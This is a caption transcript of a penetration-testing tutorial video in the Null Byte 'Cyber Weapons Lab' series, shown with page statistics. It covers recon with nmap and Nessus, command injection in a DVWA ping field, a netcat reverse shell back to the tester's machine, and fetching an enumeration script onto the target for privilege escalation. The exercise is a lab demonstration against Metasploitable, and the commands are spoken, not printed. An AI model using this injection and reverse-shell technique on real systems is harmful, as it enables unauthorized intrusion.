Conduct a Penetration Test Like a Pro in 6 Phases [Tutorial]

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
on this episode of cyber weapons lab we're gonna learn a six step framework in order to pen test like a pro [Music] penetration testing is a science and just like any other science a consistent methodology has to be applied in order to achieve good results the six steps we're going to learn today will allow you to find and exploit vulnerabilities much more easily and much more efficiently and they'll also allow you to learn from your failures much easier as well the six steps that we're going to cover today are pre-engagement reconnaissance vulnerability assessment exploitation post exploitation and reporting the engagement is the phase where we determine the type of device what we're interested in exploiting a personal computer a web server or an Internet of Things device they're gonna have a drastic impact on all of the following steps it's also important in this phase to consider the legal ramifications of performing an exploitation on that type of device as this is the point of no-return the reconnaissance phase is where we use tools such as nmap to scan local networks or tools like show Dan to scan the entire Internet to define devices that are potentially vulnerable to exploitation phase three is the vulnerability assessment phase this is where we narrow down the number of devices that we gathered in Phase two reconnaissance two devices which are known to be vulnerable to known exploitation for this we can use pre-built tools or we can use our knowledge of outdated versions of software to find devices which are known to be vulnerable stage four exploitation is arguably the most exciting phase of a penetration test this is where we use all the intelligence that we've gathered in the previous three steps and apply it to exploit our targeted device now this can vary widely based on the type of exploitation but today we're going to be showing command injection Stage five post exploitation is only possible after a successful exploitation is completed this is where we use our newfound access to the device in order to raise our privileges or gain permanent access to that device the final stage of a penetration test is reporting this is where we gather all the knowledge that we gain throughout the penetration test organize it and publish it so other people can be aware of this vulnerability on this episode of cyber weapons lab we're going to be targeting a web server on our low at work we're gonna be using nmap for reconnaissance we're going to be using Nessus for vulnerability assessment we're gonna be using command injection in order to exploit the device and we're going to using posting them in order to elevate our privileges on that device if you have any problems of this tutorial check out the article link in the description all you need to follow this tutorial is a computer to work with let's get started so for the reconnaissance stage we're just gonna use a simple nmap scan and we've covered nmap before on wondering how to and you can check out the our tutorials on wonder how to know by calm but I'm just gonna show you a real quick one liner that you can use to see if there's any open port ATS on your local network so to do that you just have to type in nmap and then s capital v for service scan and then you're just gonna select the range of IPs that you want to scan somebody 192.168.1.1 and we're gonna specify our subnet mask with slash 24 then i'm going to specify port 80 and i'm gonna go ahead and let that run it's gonna take a couple seconds because it's not a huge scan and after a couple seconds we can see all the devices which are attached to our local network and whether it's open closed or filtered so if it's open that means that port that port 80 is open to use if it's closed that means obviously we can't use port 80 and then filtered means it may or may not be open but we can't connect to it usually port 80 s aren't filtered that's you do something with SSH or other TCP ports but today we're gonna be interested in one 92168 1.1 4 6 and we can see that its port 80 is open now this is a case where I actually have identified that my target is this exact device here but you can use this reconnaissance stage to find any other port 80 device which has an open port 80 on your local network so now that we used some network reconnaissance to identify our target we're gonna go to the next stage which is vulnerability assessment so to do that we're gonna use a tool called nassos which has been covered on NOAA bite before and that article will be links in the description as well so this is gonna be assuming that you have necess already up and running on a computer so to navigate to nessus you just have to open a web browser I'm using phox another type of an HTTP colon forward slash forward slash localhost and then you know specified port 88 30 for your web browser might notify you that it could be a security risk to navigate to that address but you're just gonna let it know it's okay and once you're here the first time using estus you're gonna have to set up an account I already have so I'm going to log in under Koufax and then once you open the necess the main screen is all the different scans that you've saved or have used previously on Nessus I've already done the scan because it can take a while but I'll just show you exactly how I set it up so you just press this new scan button and then we're gonna do a basic local network scan we're gonna call it null byte test this is for the video tutorial and we're just gonna save it in the default folder and you could specify the target that we identified which is 1.1 4 6 or you can also do it like we did an nmap just leave it at 1 and then specify the subnet mask 24 and this will basically leave these first three alone and then just cycle through that last number on our IP so additionally but like that I'm gonna save it and then you'll see the snow bite test and we can run it because it's never been run before so you can launch it and because this is a pretty big scan it will take a while so before I started recording I ran the scan earlier and as you can see my Metasploit able virtual machine has taking up a lot of owner abilities and there's some other devices I want to network which might be susceptible to some vulnerabilities as well so I'm gonna go ahead and see what this is vulnerable to as you can see it's using SSL so there's some issues with SSL which is usually associated with port 80 and so we know that if we navigate to the web app then it's probably gonna be a vulnerability their command injection might be possible so once you've identified that yes this target that I'm interested in is very vulnerable you can carry on to the fourth step of the penetration test which is the actual exploit the exciting part so my demonstration for a exploit is just going to be a simple command injection and so this is a part of Metasploit level twos framework which is the dam owner but web app but this could be a substitute for any web app it's just this is just for demonstration purposes so if for some reason a web app allows you to ping IP addresses then you can take advantage of that and use the computer that you're using to ping and use it for whatever you want to do in this case I'm gonna create a reverse shelf so I can just do a simple scan of the local host which is 127.0.0.1 and if I submit that they'll give me some information back now if I specify this remote host and do an LS command I'm not actually on this computer I haven't logged into this computer at all but I'm able to actually see the files on this Metasploit able computer without having to put a password in or anything so because this is not the best way to interact with that computer let's go ahead and create a netcat River shell now to do that you're gonna have to open up your terminal again and we're gonna create a listening shell on our local computer so to do that you just type in NC for netcat tak l for listening and the port you want to listen on I'm going to do one two three four so now it's not gonna give you any feedback it's just already running the second you do that so now we're gonna specify a local host and then we're gonna do I typed in the command earlier as you can see the test but you're gonna type in and cat and then you're gonna specify the IP address of your local computer where you're sending this to so I already know that IP is 192.168.1.1 and they're gonna specify the port which is one two three four and then we're going to specify tacky for execute and we're going to create a terminal in the net cat shell so you can go ahead and submit that it might take a second or two and then now if we go back to our terminal you can see some funky stuff happen and actually closed so let's actually try that again oops not clear I'm gonna try listening again and then we're gonna do one two seven one six eight two four three yeah that all looks right and if you type in it's still loading so now if you do Who am I you get this www data and if we do LS here we can see that these are the files actually on the Metasploit able computer and now we basically have a complete shell so we can ping from here now and you can see it's getting this data and then actually enclosed it but from here you can move on to the post exploitation phase of the attack I'm going to be using a previous video within on a tool called posting um which you can use to scan all device and find any vulnerabilities that that device is susceptible to so you can either raise your privileges or create a permanent backdoor into that computer so assuming that you've been able to access a the target computer either by creating a reverse show with command injection or whatsoever we can go ahead and install posting them onto the target computer but first let's download it onto our computer first I just for reference this left's black and green terminal is going to be representing my local computer and this blue and white terminal on the right hand side is going to be representing the targets computer this is my reversal into that computer so if you go ahead and navigate to the node by article for posting them and you can if you scroll up to one of the first steps actually we can download posting them by using the stub you get command just downloading the script directly and we're going to go ahead and install it onto our local machine okay and then now we can see that we have posting them somewhere there that's the posting them that SH and let's go ahead and set up a simple HTTP server on port 1 2 3 4 ok and then now if we go to our target computer and now we can grab the posting of that SH from our local machine oops and you got to specify the port of course there we go now if we look on this local machine we have posts in them so we can go ahead and try to route of posting them like we would have normal bash script but more often than that it's not gonna work because it doesn't have execute privileges so to do that you just have to use chmod ok even though we can go ahead and try and run it like we did earlier when we go ahead and make this bigger and as we can see posting them is working now so let's go ahead and I'll show off a couple features so first we can see what versions of software are actually installed on this computer so we can see if there's any outdated versions which can be exploited to escalate privileges so to do that all you have to do is run posting them tak v oops Sh we can see versions for MySQL Apache Java and we can see if any of these are old outdated and we Vaughn herbal for exploitation and 2020 or whatever year you're doing this in and then one more thing we can do is we can see what development tools are available to us on this computer whether PHP is installed on this with a Perl or Python so we can know what kind of scripts can actually be applied to this configure OOP and it's a bash file and so we got some interesting information we can see that Python Perl PHP GCC which is a C++ compiler C C which is a C compiler and nmap are all installed on this computer so if we have a Python script that we are ready to deploy that will you know is pretty effective at escalating user privileges then we know that's we will be able to deploy on to this computer see how files can be uploaded we can use FTP netcat W get which is what we use to actually get posted them onto this computer curl that's all that is available to us and we can see what type of shell terminal tools are available to us so VI and them are installed and map is installed Ruby which wasn't specified earlier and we can see where all of these environment variables are actually installed in case one mess with that and yeah so that's just the basics of things you can do with posting them to escalate your privileges in the post exploitation stage of a penetration test if you liked this tutorial be sure to check out our website where we have hundreds of free articles and videos as well as premium paid content like the ethical hacking certification bundle which features pen testing with a Waze app WordPress hacking and hardening and the comte a cybersecurity analyst prep course check out the link in the description below well performing all of these steps to completion may seem a little overzealous for any complicated tasks such as pen testing it's important to have a proven set of steps that you can fall back on a case things go awry and I should remind you that what we showed off today was just one demonstration of these six steps your experience with these six section a very widely based on the type of device that you're targeting or the type of vulnerability that you're trying to exploit again if you have any problems following this video tutorial you can check out the article in the description if you have any ideas for a future video hit me up at Twitter at Nik Kershaw thank you guys for watching and I'll see you next time
Info
Channel: Null Byte
Views: 96,978
Rating: 4.9574027 out of 5
Keywords: wht, wonderhowto, nullbyte, null byte, hack, hacking, hacker, hacks, hackers, how to hack, howto, how to, tutorial, guide, cyber weapon, cyber weapons, cyber, cyber weapons lab, pentesting, pentester, pentesting tools, pentesting 101, penetration testing tools, information security, penetration testing, pen testing, pen test, penetration test, cybersecurity, pen tester
Id: 8a1yTN2kFNw
Channel Id: undefined
Length: 13min 37sec (817 seconds)
Published: Mon Aug 24 2020
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.